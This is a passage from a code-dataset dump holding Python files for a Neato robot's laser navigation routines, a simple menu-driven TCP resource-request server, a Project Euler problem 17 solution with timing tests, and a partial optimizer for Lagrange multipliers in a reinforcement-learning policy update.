return (L, R)\n \n def __esquiva(self):\n dist_28 = 350\n #print(values)\n values = self.laser.get_laser()\n self.__send_lasercoords(self.laser.get_last_laser_coords())\n if values[0] < 650:\n auxvals = [values[1] + values[2], values[8] + values[9]]\n idx = auxvals.index(max(auxvals)) #Agafar el valor maxim\n if idx == 0: #Girar a l'esquerre\n self.theta = +3.141516/4.5\n print(\"Turn left\")\n else:\n self.theta = -3.141516/4.5\n print(\"Turn right\")\n esq = True\n elif (values[1] < self.distance) or (values[9] < self.distance):\n if (values[1] < self.distance) and (values[9] < self.distance):\n if values[9] < values[1]:\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\") \n elif(values[1] < self.distance):\n self.theta = -3.141516/8\n print(\"Turn right\")\n else:\n self.theta = +3.141516/8\n esq = True\n elif (values[8] < dist_28) or (values[2] < dist_28):\n if (values[8] < dist_28) and (values[2] < dist_28):\n if values[8] < values[2]:\n self.theta = +3.141516/10\n print(\"Turn left\")\n else:\n self.theta = -3.141516/10\n print(\"Turn right\")\n elif(values[8] < dist_28):\n self.theta = +3.141516/10\n print(\"Turn left\")\n else:\n self.theta = -3.141516/10\n print(\"Turn right\")\n esq = True\n else:\n self.theta = 0\n esq = False\n print(\"Front: \", values[0], \" OuterLeft: \", values[2], \" OuterRight: \", values[8], \" CenterLeft: \", values[1], \" CenterRight: \", values[9])\n print(\"Theta: \", self.theta)\n if(esq):\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n #print(comando)\n self.enviaR(comando, 0.4)\n return(esq)\n \n def random_path(self):\n print(\"Starting random path without crashing\")\n while True:\n values = self.laser.get_laser()\n #print(values)\n if values[0] < 650:\n auxvals = [values[1] + values[2], values[8] + values[9]]\n idx = auxvals.index(max(auxvals)) #Agafar el valor maxim\n if idx == 0: #Girar a l'esquerre\n self.theta = +3.141516/3.5\n print(\"Turn left\")\n else:\n self.theta = -3.141516/3.5\n print(\"Turn right\")\n elif (values[1] < self.distance) or (values[9] < self.distance):\n if (values[1] < self.distance) and (values[9] < self.distance):\n if values[9] < values[1]:\n self.theta = +3.141516/6\n print(\"Turn left\")\n else:\n self.theta = -3.141516/6\n print(\"Turn right\") \n elif(values[1] < self.distance):\n self.theta = -3.141516/6\n print(\"Turn right\")\n else:\n self.theta = self.theta+3.141516/6\n elif (values[8] < self.distance) or (values[2] < self.distance):\n if (values[8] < self.distance) and (values[2] < self.distance):\n if values[8] < values[2]:\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\")\n elif(values[8] < self.distance):\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\")\n else:\n self.theta = 0\n print(\"Front: \", values[0], \" OuterLeft: \", values[2], \" OuterRight: \", values[8], \" CenterLeft: \", values[1], \" CenterRight: \", values[9])\n print(\"Theta: \", self.theta)\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n 
distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n #print(comando)\n self.enviaR(comando, 0.1)\n\n def __followWal(self, right, angle, d):\n angle_deg = angle%(2*math.pi)\n angle_deg = (angle_deg/(2*math.pi))*360\n angle_index = 0\n if(angle_deg > 340 or angle_deg < 19):\n angle_index = 0\n else:\n angle_deg = angle_deg - 19\n angle_index = int(math.ceil(angle_deg/36.0))\n \n values = self.laser.get_laser()\n threshold = d\n print(\"Angle deg: \", angle_deg)\n print(\"Angle index: \", angle_index)\n print(\"Distance to reach: \", d)\n if (values[angle_index%10] > threshold and values[(angle_index - 1)%10] > threshold and values[(angle_index + 1)%10] > threshold):\n print(\"IM GOIN TO THEE POINT!!!!!!!!!!!!!\")\n return False\n if right:\n side1 = values[8]\n side2 = values[9]\n sign = 1\n else:\n side1 = values[2]\n side2 = values[1]\n sign = -1\n if values[0] < 600:\n self.theta = sign * 3.141516/4\n print(\"FRONT\")\n wall = True\n print(\"Following wall now\")\n else:\n wall = True\n print(\"Following wall now\")\n if (side1 > 300 or side2 > 300):\n self.theta = sign * -3.141516/12\n print(\"Turn right\")\n elif (side1 < 280 or side2 < 280):\n self.theta = sign * 3.141516/12\n print(\"Turn left\")\n else:\n self.theta = 0\n \n if(wall):\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n return wall\n\n def followWal(self, right):\n self.gotoWall(right)\n print(\"Following wall now\")\n while True:\n values = self.laser.get_laser()\n if right:\n side1 = values[8]\n side2 = values[9]\n sign = 1\n else:\n side1 = values[2]\n side2 = values[1]\n sign = -1\n if values[0] < 650:\n self.theta = sign * 3.141516/4\n print(\"FRONT\")\n elif (side1 > 330 or side2 > 330):\n self.theta = sign * -3.141516/12\n print(\"Turn right\")\n elif (side1 < 300 or side2 < 300):\n self.theta = sign * 3.141516/26\n print(\"Turn left\")\n else:\n self.theta = 0\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n\n def gotoWall(self, right):\n print(\"Going to wall\")\n values = self.laser.get_laser()\n while(values[0] > 750):\n print(values)\n self.theta = 0\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n values = self.laser.get_laser()\n print(\"Wall reached\")\n values = 
self.laser.get_laser()\n        if right:\n            comando = 'SetMotor LWheelDist 0 RWheelDist ' + str(int(round((math.pi/2) * self.S))) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n        else: \n            comando = 'SetMotor LWheelDist ' + str(int(round((math.pi/2) * self.S))) + ' RWheelDist 0 Speed ' + str(self.speed * pow(-1, self.direction))\n        self.enviaR(comando, 2)\n\n    def exitMaze(self, x, y):\n        print(\"Escaping Maze\")\n        L, R, angle, d = self.odometry.getGoToPoint(x, y)\n        while (L + R) > 0: \n            if not self.__followWal(True, angle, d):\n                comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n                self.enviaR(comando, 0.1)\n            L_read, R_read = self.__get_motors()\n            self.odometry.updateOdometry(L_read, R_read)\n            L, R, angle, d = self.odometry.getGoToPoint(x, y)\n        \n        comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n        self.enviaR(comando, 0.1) \n\n    def fuig_segueix(self, fuig):\n        get_angle = self.__get_angle_fuig\n        if fuig:\n            print(\"Fleeing\")\n        else:\n            get_angle = self.__get_angle_persegueix\n            print(\"Pursuing\")\n        while True:\n            closer = self.laser.get_closer_object()\n            self.theta, direct = get_angle(closer)\n            print(\"Closer: \", closer)\n            print(\"Angle: \", self.theta)\n            distancia_R = (((250 ) + (self.S * self.theta)) * self.tiempo) * pow(-1, direct)\n            distancia_L = (((250 ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, direct)\n            print(\"RL: \", [distancia_R, distancia_L])\n            comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(250)\n            print(\"Comando: \", comando)\n            self.enviaR(comando, 0.5)\n    \n    def __get_angle_fuig(self, closer):\n        if closer == 0 or closer == 9 or closer == 1:\n            direct = 1\n        else:\n            direct = 0\n        if closer == 0:\n            return 0, direct \n        elif closer < 5:\n            return -math.pi + (closer * math.pi/5), direct\n        elif closer > 5:\n            return math.pi - (abs(closer - 8) * math.pi/5), direct\n        else:\n            return 0, direct\n    \n    def __get_angle_persegueix(self, closer):\n        if closer == 5 or closer == 6 or closer == 4:\n            direct = 1\n        else:\n            direct = 0\n        if closer == 5:\n            return 0, direct\n        elif closer > 0 and closer < 6:\n            return math.pi - (abs(closer-5) * math.pi/5), direct\n        elif closer > 5:\n            return -math.pi + (abs(closer-5) * math.pi/5), direct\n        else:\n            return 0, direct\n\n    def enviaR(self, msg, t):\n        buffer = envia(self.ser, msg, t)\n        return buffer\n    \n    def stop(self):\n        self.exit = True\n        self.thread_odometry.join()\n        comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n        self.enviaR(comando, 0.1)\n        self.laser.enable_laser(False)\n        self.viewer.quit()\n    \n    def __val_to_coord(self, val, index, odo):\n        angle = ((index/360.0) * 2*math.pi) + odo[2][0]\n        point = ((val * math.cos(angle)) + odo[0][0], (val * math.sin(angle)) + odo[1][0])\n        return point\n","sub_path":"Laser2/neatoRobot2.py","file_name":"neatoRobot2.py","file_ext":"py","file_size_in_byte":15711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"38436589","text":"import socket \r\nimport time\r\nfrom threading import Thread\r\nfrom _socket import gaierror\r\n\r\n\r\n\r\nclass ServerSocket(object):\r\n\r\n    def __init__(self):\r\n        # create a socket object\r\n        self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \r\n        # get local machine name\r\n        host = socket.gethostname() \r\n        port = 9000 \r\n        # bind to the port\r\n        self.serversocket.bind((host, port)) \r\n        # queue up to 5 requests\r\n        self.serversocket.listen(5) \r\n    \r\n    def accept(self):\r\n        clientsocket,client_addr = self.serversocket.accept() \r\n        if not 
clientsocket:\r\n            raise gaierror(\"Not able to connect\")\r\n        return clientsocket, client_addr\r\n    \r\n    \r\n    def send(self, clientsocket, send_buffer):\r\n        send_buffer = send_buffer + \"\\r\\n\"\r\n        clientsocket.send(send_buffer.encode())\r\n    \r\n    \r\n    def recv(self, clientsocket):\r\n        recv_buffer = clientsocket.recv(1024).decode() \r\n        return recv_buffer \r\n    \r\n    \r\n    def close(self, clientsocket):\r\n        clientsocket.close()\r\n    \r\n\r\n\r\nclass ServerThread(Thread):\r\n    def __init__(self):\r\n        Thread.__init__(self)\r\n        self.serverobj = None\r\n        self.clientsocket = None\r\n    \r\n    \r\n    # Option A\r\n    def minNcpuHr(self):\r\n        message = \"Number of CPU required::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        cpu = self.serverobj.recv(self.clientsocket)\r\n        \r\n        \r\n        message = \"Number of Hours::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        hrs = self.serverobj.recv(self.clientsocket)\r\n    \r\n    \r\n    #Option B\r\n    def maxPriceHr(self):\r\n        message = \"Amount limit::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        cpu = self.serverobj.recv(self.clientsocket)\r\n        \r\n        \r\n        message = \"Number of Hours::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        hrs = self.serverobj.recv(self.clientsocket)\r\n    \r\n    \r\n    #Option C\r\n    def combination(self):\r\n        message = \"Number of CPU required::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        cpu = self.serverobj.recv(self.clientsocket)\r\n        \r\n        \r\n        message = \"Number of Hours::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        hrs = self.serverobj.recv(self.clientsocket)\r\n        \r\n        message = \"Amount limit::\"\r\n        self.serverobj.send(self.clientsocket,message)\r\n        hrs = self.serverobj.recv(self.clientsocket)\r\n    \r\n    \r\n    def command_interface(self,**kwargs):\r\n        self.clientsocket = kwargs[\"clientsocket\"]\r\n        self.serverobj = kwargs[\"serverobj\"]\r\n        \r\n        message = \"Hi: We provide Resource \\n\" +\\\r\n                  \"Please choose any option from below options \\n\"+ \\\r\n                  \"Press A: minimum N CPUs for H hours \\n\"+\\\r\n                  \"Press B:: Maximum price they are willing to pay for H hours\\n\"+\\\r\n                  \"Press C:: Combination of both.\\n\"\r\n        \r\n        self.serverobj.send(self.clientsocket,message) \r\n        recv_buffer = self.serverobj.recv(self.clientsocket) \r\n        \r\n        if recv_buffer == \"A\":\r\n            self.minNcpuHr()\r\n        \r\n        elif recv_buffer == \"B\":\r\n            self.maxPriceHr()\r\n        \r\n        elif recv_buffer == \"C\":\r\n            self.combination()\r\n        \r\n        else:\r\n            self.serverobj.send(self.clientsocket,\"OOPS!! You did not choose right options\")\r\n            self.serverobj.close(self.clientsocket)\r\n    \r\n\r\nif __name__ == '__main__':\r\n    server = ServerSocket()\r\n    while True:\r\n        clientsocket,addr = server.accept()\r\n        worker = ServerThread()\r\n        server_thread = Thread(target=worker.command_interface,name=\"client \"+str(addr),kwargs={'serverobj':server,\"clientsocket\":clientsocket})\r\n        server_thread.start()\r\n        \r\n        \r\n","sub_path":"Resource mangement/src/resource_mangement_v.2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"220102465","text":"# This program solves Euler's problem 17\r\n# problem 17: If all the numbers from 1 to 1000 inclusive were written out in words, how many letters would be used?\r\n## note: do not count spaces or hyphens, use 'and' in hundreds numbers. 
For example, 142 is one hundred and forty-two\r\n\r\n\r\ndef wordbuilder(useless):\r\n\t# we need to develop a way to convert a number to a word\r\n\t## first lets put together some dictionaries\r\n\r\n\t# ones place name dictionary\r\n\tones = { 0:'', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine' }\r\n\r\n\t# tens place name dictionary\r\n\ttens = { 0:'', 1:'ten', 2:'twenty', 3:'thirty', 4:'forty', 5:'fifty', 6:'sixty', 7:'seventy', 8:'eighty', 9:'ninety' }\r\n\r\n\t# hundreds place name dictionary (leave out spaces)\r\n\thundreds = { 0:'', 1:'onehundred', 2:'twohundred', 3:'threehundred', 4:'fourhundred', 5:'fivehundred', 6:'sixhundred', 7:'sevenhundred', 8:'eighthundred', 9:'ninehundred' }\r\n\r\n\t# this gets the basics, but what about the teens?\r\n\t# special teens definitions\r\n\tteens = { 0:'ten', 1:'eleven', 2:'twelve', 3:'thirteen', 4:'fourteen', 5:'fifteen', 6:'sixteen', 7:'seventeen', 8:'eighteen', 9:'nineteen' }\r\n\r\n\t# but how do we know when to use the teens instead of the usual system?\r\n\t## We'll simply have our code peek ahead when the tens place is a 1\r\n\r\n\t# now lets get down to the meat\r\n\tsumm = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# accumulator\r\n\tfor i in range(1, 1001):\t\t\t\t\t\t\t\t\t\t\t# use 1001 because range() is not inclusive on upper limit\r\n\t\ts = str(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# convert to a string\r\n\t\tword = ''\t\t\t\t\t\t\t\t\t\t\t\t\t\t# use this to build up word\r\n\t\tteen = False\t\t\t\t\t\t\t\t\t\t\t\t\t# a flag to check if number has teens\r\n\t\tif len(s) == 4:\t\t\t\t\t\t\t\t\t\t\t\t\t# pad it with leading zeros if nessesary\r\n\t\t\t#cool\r\n\t\t\tdo = 'nothing'\r\n\t\telif len(s) == 1:\r\n\t\t\ts = '000' + s\r\n\t\telif len(s) == 2:\r\n\t\t\ts = '00' + s\r\n\t\telif len(s) == 3:\r\n\t\t\ts = '0' + s\r\n\r\n\t\t# eval thousands place\r\n\t\tif int(s[0]) == 1:\r\n\t\t\tword = \"onethousand\"\r\n\r\n\t\t# eval hundreds place\r\n\t\tword = word + hundreds[int(s[1])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# need to peek ahead to see if we need to add 'and'\r\n\t\tif int(s[1]) != 0 and (int(s[2]) != 0 or int(s[3]) != 0):\t\t# if the tens or ones place is a non-zero number need the 'and'\r\n\t\t\tword = word + 'and'\r\n\r\n\t\t# eval tens place\r\n\t\tif int(s[2]) == 1:\t\t\t\t\t\t\t\t\t\t\t\t# dict lookup if possibly a teen\r\n\t\t\tword = word + teens[int(s[3])]\r\n\t\t\tteen = True\t\t\t\t\t\t\t\t\t\t\t\t\t# set teen flag\r\n\t\telse:\r\n\t\t\tword = word + tens[int(s[2])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# eval ones place\r\n\t\tif not teen:\r\n\t\t\tword = word + ones[int(s[3])]\t\t\t\t\t\t\t\t# dict lookup if flag not set\r\n\r\n\t\tsumm += len(word)\t\t\t\t\t\t\t\t\t\t\t\t# add length to accumulator\r\n\r\n\treturn summ\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# answer: 21124\r\n\r\n# sweet! we got what we wanted! but we could make it a little less computationaly intensive\r\n## How? well, we don't actually need to figure out the words! 
we can instead have the dict values be the number of letters in the word and add that directly to the accumulator\r\n## Let's rewrite the first function to do this instead!\r\ndef wordAccumulator(useless):\r\n\t# we need to develop a way to convert a number to a word\r\n\t## first lets put together some dictionaries\r\n\r\n\t# ones place name dictionary\r\n\tones = { 0:0, 1:3, 2:3, 3:5, 4:4, 5:4, 6:3, 7:5, 8:5, 9:4 }\r\n\r\n\t# tens place name dictionary\r\n\ttens = { 0:0, 1:3, 2:6, 3:6, 4:5, 5:5, 6:5, 7:7, 8:6, 9:6 }\r\n\r\n\t# hundreds place name dictionary (leave out spaces)\r\n\thundreds = { 0:0, 1:10, 2:10, 3:12, 4:11, 5:11, 6:10, 7:12, 8:12, 9:11 }\r\n\r\n\t# this gets the basics, but what about the teens?\r\n\t# special teens definitions\r\n\tteens = { 0:3, 1:6, 2:6, 3:8, 4:8, 5:7, 6:7, 7:9, 8:8, 9:8 }\r\n\r\n\t# but how do we know when to use the teens instead of the usual system?\r\n\t## We'll simply have our code peek ahead when the tens place is a 1\r\n\r\n\t# now lets get down to the meat\r\n\tsumm = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# accumulator\r\n\tfor i in range(1, 1001):\t\t\t\t\t\t\t\t\t\t\t# use 1001 because range() is not inclusive on upper limit\r\n\t\ts = str(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# convert to a string\r\n\t\tteen = False\t\t\t\t\t\t\t\t\t\t\t\t\t# a flag to check if number has teens\r\n\t\tif len(s) == 4:\t\t\t\t\t\t\t\t\t\t\t\t\t# pad it with leading zeros if nessesary\r\n\t\t\t#cool\r\n\t\t\tdo = 'nothing'\r\n\t\telif len(s) == 1:\r\n\t\t\ts = '000' + s\r\n\t\telif len(s) == 2:\r\n\t\t\ts = '00' + s\r\n\t\telif len(s) == 3:\r\n\t\t\ts = '0' + s\r\n\r\n\t\t# eval thousands place\r\n\t\tif int(s[0]) == 1:\r\n\t\t\tsumm += 11\r\n\r\n\t\t# eval hundreds place\r\n\t\tsumm += hundreds[int(s[1])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# need to peek ahead to see if we need to add 'and'\r\n\t\tif int(s[1]) != 0 and (int(s[2]) != 0 or int(s[3]) != 0):\t\t# if the tens or ones place is a non-zero number need the 'and'\r\n\t\t\tsumm += 3\r\n\r\n\t\t# eval tens place\r\n\t\tif int(s[2]) == 1:\t\t\t\t\t\t\t\t\t\t\t\t# dict lookup if possibly a teen\r\n\t\t\tsumm += teens[int(s[3])]\r\n\t\t\tteen = True\t\t\t\t\t\t\t\t\t\t\t\t\t# set teen flag\r\n\t\telse:\r\n\t\t\tsumm += tens[int(s[2])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# eval ones place\r\n\t\tif not teen:\r\n\t\t\tsumm += ones[int(s[3])]\t\t\t\t\t\t\t\t# dict lookup if flag not set\r\n\r\n\treturn summ\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# answer: 21124\r\n\r\n\r\n# lets compare the answers...\r\n#wordbuilder()\r\n#wordAccumulator()\r\n\r\n# they're the same! 
so now let's see if the new program is any faster\r\n## first let's build a timing function\r\ndef timeTest(funcs, args, runs):\t\t\t\t\t\t\t\t# takes a list with functions, any arguments as a list, and the number of runs to test over\r\n\timport time\r\n\r\n\texTimes = [0] * len(funcs)\r\n\r\n\tfor i in range(runs):\r\n\t\tfor j in range(len(funcs)):\r\n\t\t\tfor k in range(runs):\r\n\t\t\t\tstart = time.time()\r\n\t\t\t\tfuncs[j](args)\r\n\t\t\t\texTimes[j] += time.time() - start\r\n\r\n\tfor i in range(len(exTimes)):\r\n\t\texTimes[i] = exTimes[i] / (runs * runs)\r\n\treturn exTimes\r\n\r\n# next let's build a way to easily show the times\r\ndef displayTimes(funcs, args, runs, timeTester):\r\n\ttimeList = timeTester(funcs, args, runs)\r\n\tfor i in range(len(timeList)):\r\n\t\tif i == 0:\r\n\t\t\tprint(\"Function 1:\", timeList[i], \"s\")\r\n\t\telse:\r\n\t\t\tprint(\"Function \", i + 1, \": \", timeList[i], \" s; \", ((timeList[0] / timeList[i]) * 100) - 100, \" % change from \", 1, sep=\"\")\r\n\r\n# now to run the test\r\n#displayTimes([wordbuilder, wordAccumulator], 0, 10, timeTest)\r\n","sub_path":"Euler Problems/Euler17.py","file_name":"Euler17.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186793406","text":"import scipy.optimize\n\n# import numpy as np\nimport autograd.numpy as np # Thinly-wrapped numpy\nfrom autograd import grad\n\nimport tensorflow as tf\nfrom baselines import logger\nimport baselines.common.tf_util as U\n\nclass EtaOmegaOptimizer(object):\n \"\"\"\n Finds eta and omega Lagrange multipliers.\n \"\"\"\n\n def __init__(self, beta, epsilon, init_eta, init_omega):\n self.init_eta_omega(beta, epsilon, init_eta, init_omega)\n\n def optimize(self, w_theta, Waa, Wsa, wa, varphis, Kt, prec, is_valid_eta_omega, old_entropy, eta=None):\n\n # wa = w_beta * \\grad_beta \\varphi_beta(s) * K^T * Prec\n\n if False:\n f_dual = self.opt_info['f_dual']\n f_dual_grad = self.opt_info['f_dual_grad']\n\n # Set BFGS eval function\n def eval_dual(input):\n param_eta = input[0]\n param_omega = input[1]\n val = f_dual(*([varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy]))\n return val.astype(np.float64)\n\n # Set BFGS gradient eval function\n def eval_dual_grad(input):\n param_eta = input[0]\n param_omega = input[1]\n grad = f_dual_grad(*([varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy]))\n return np.asarray(grad)\n\n if eta is not None:\n param_eta = eta\n else:\n param_eta = self.param_eta\n\n if self.beta == 1000000:\n beta = 0\n else:\n beta = old_entropy - self.beta\n\n # eta_before = param_eta\n # omega_before = self.param_omega\n # dual_before = eval_dual([eta_before, omega_before])\n # dual_grad_before = eval_dual_grad([eta_before, omega_before])\n\n x0 = [param_eta, self.param_omega]\n\n # TEST\n # small = 0.000000001\n # f1 = [self.param_eta - small, self.param_omega]\n # f2 = [self.param_eta + small, self.param_omega]\n # fd = (eval_dual(f1) - eval_dual(f2)) / (2 * small)\n #\n # duals = self.opt_info[\"f_duals\"](*([varphis, Kt, prec, Waa, Wsa, wa] + [eta_before, omega_before, old_entropy]))\n # logger.log(\"Theano eta/omega: \" + str(eta_before) + \"/\" + str(omega_before) + \": \" + str(dual_before) +\n # \", \" + str(duals) + \", grad: \" + str(eval_dual_grad(x0)) + \", fd: \" + str(fd))\n # # END TEST\n\n # Create dual function\n def eval_dual(input):\n param_eta = input[0]\n param_omega = input[1]\n\n # ha(s): eta * 
(\\varphi(s)^T * K^T * \\Sigma^{-1} + W_{sa}) + wa(s))\n ha = np.dot(varphis, param_eta * np.dot(Kt, prec) + Wsa) + wa\n\n # hss(s): eta * (\\varphi(s)^T * K^T * \\Sigma^{-1} * K * \\varphi(s))\n varphisKt = np.dot(varphis, Kt)\n hss = param_eta * np.sum(np.dot(varphisKt, prec) * varphisKt, axis=1)\n\n Haa = param_eta * prec + Waa\n # Haa = 0.5 * (Haa + np.transpose(Haa))\n HaaInv = np.linalg.inv(Haa)\n\n # The two terms 'term1' and 'term2' which come from normalizers of the\n # 1. Original policy distribution\n # 2. The distribution after completing the square\n sigma = np.linalg.inv(prec)\n\n term1 = -0.5 * param_eta * np.linalg.slogdet(2 * np.pi * sigma)[1]\n if self.beta == 10000000:\n term2 = 0.5 * param_eta * np.linalg.slogdet(\n 2 * np.pi * param_eta * HaaInv)[1]\n else:\n term2 = 0.5 * (param_eta + param_omega) * np.linalg.slogdet(\n 2 * np.pi * (param_eta + param_omega) * HaaInv)[1]\n \n dual = param_eta * self.epsilon - param_omega * beta + \\\n term1 + term2 + np.mean(\n 0.5 * (np.sum(np.dot(ha, HaaInv) * ha, axis=1) - hss))\n\n return dual\n\n # Automatic gradient of the dual\n eval_dual_grad = grad(eval_dual)\n\n if True:\n def fx(x):\n eta, omega = x # eta: Lagrange variable of KL constraint, omega: of the entropy constraint\n error_return_val = 1e6, np.array([0., 0.])\n if eta + omega < 0:\n return error_return_val\n if not is_valid_eta_omega(eta, omega, w_theta):\n return error_return_val\n return eval_dual(x), eval_dual_grad(x)\n else:\n def fx(x):\n eta, omega = x # eta: Lagrange variable of KL constraint, omega: of the entropy constraint\n error_return_val = 1e6, np.array([0., 0.])\n if eta + omega < 0:\n return error_return_val\n if not is_valid_eta_omega(eta, omega, w_theta):\n return error_return_val\n return eval_dual(x), eval_dual_grad(x) # L-BFGS-B expects double floats\n # return np.float64(eval_dual(x)), np.float64(eval_dual_grad(x)) # L-BFGS-B expects double floats\n\n logger.log('optimizing dual')\n\n # Make sure valid initial covariance matrices\n while (not is_valid_eta_omega(x0[0], x0[1], w_theta)):\n x0[0] *= 2\n logger.log(\"Eta increased: \" + str(x0[0]))\n\n if eta is None:\n omega_lower = -100\n res = scipy.optimize.minimize(fx, x0, method='SLSQP', jac=True,\n bounds=((1e-12, 1e6), (omega_lower, 1e6)), options={'ftol': 1e-12})\n else:\n omega_lower = -100\n eta_lower = np.max([eta - 1e-3, 1e-12])\n res = scipy.optimize.minimize(fx, x0, method='SLSQP', jac=True,\n bounds=((eta_lower, eta + 1e-3), (omega_lower, 1e6)), options={'ftol': 1e-16})\n\n # Make sure that eta + omega > 0\n if res.x[0] + res.x[1] <= 0:\n res.x[1] = 1e-6 - res.x[0]\n\n if self.beta == 1000000:\n res.x[1] = 0\n\n logger.log(\"dual optimized, eta: \" + str(res.x[0]) + \", omega: \" + str(res.x[1]))\n return res.x[0], res.x[1]\n\n # def f(x, grad):\n # if grad.size > 0:\n # grad[:] = eval_dual_grad(x)\n #\n # return np.float64(eval_dual(x))\n\n # self.nlopt_opt.set_min_objective(f)\n # # Set parameter boundaries: eta, omega > 0\n # self.nlopt_opt.set_lower_bounds([1e-12, 1e-12])\n #\n # self.nlopt_opt.set_ftol_rel(1e-12)\n # self.nlopt_opt.set_xtol_rel(1e-12)\n # self.nlopt_opt.set_vector_storage(100)\n\n # try:\n # x = self.nlopt_opt.optimize([self.param_eta, self.param_omega])\n # except RuntimeError:\n # entropy = np.mean(self.policy.distribution.entropy_log_probs(samples_data[\"agent_infos\"]))\n # if entropy < 1e-9:\n # # ignore error since we already converged and are at the optimal policy\n # x = [eta_before, omega_before]\n # else:\n # print(\"Error during optimization of the 
dual...\")\n # raise\n\n # logger.log('dual optimized')\n #\n # # get optimal values\n # return x[0], x[1]\n\n def init_eta_omega(self, beta, epsilon, init_eta, init_omega):\n # Here we define the symbolic function for the dual and the gradient\n\n self.beta = beta\n self.epsilon = epsilon\n\n # Init dual param values\n self.param_eta = init_eta\n self.param_omega = init_omega\n\n self.param_eta_non_lin = init_eta\n self.param_omega_non_lin = init_omega\n\n param_eta = tf.placeholder(dtype=tf.float32, shape=[], name=\"param_eta\")\n param_omega = tf.placeholder(dtype=tf.float32, shape=[], name=\"param_omega\")\n old_entropy = tf.placeholder(dtype=tf.float32, shape=[], name=\"old_entropy\")\n\n varphis = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"varphis\")\n Kt = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Kt\")\n prec = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"prec\")\n Waa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Waa\")\n Wsa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Wsa\")\n wa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"wa\")\n\n if self.beta == 100000000:\n beta = 0\n else:\n beta = old_entropy - self.beta\n\n ha = tf.matmul(varphis, param_eta * tf.matmul(Kt, prec) + Wsa) + wa\n \n varphisKt = tf.matmul(varphis, Kt)\n hss = param_eta * tf.reduce_sum(tf.matmul(varphisKt, prec) * varphisKt, axis=1)\n\n Haa = param_eta * prec + Waa\n HaaInv = tf.matrix_inverse(Haa)\n\n 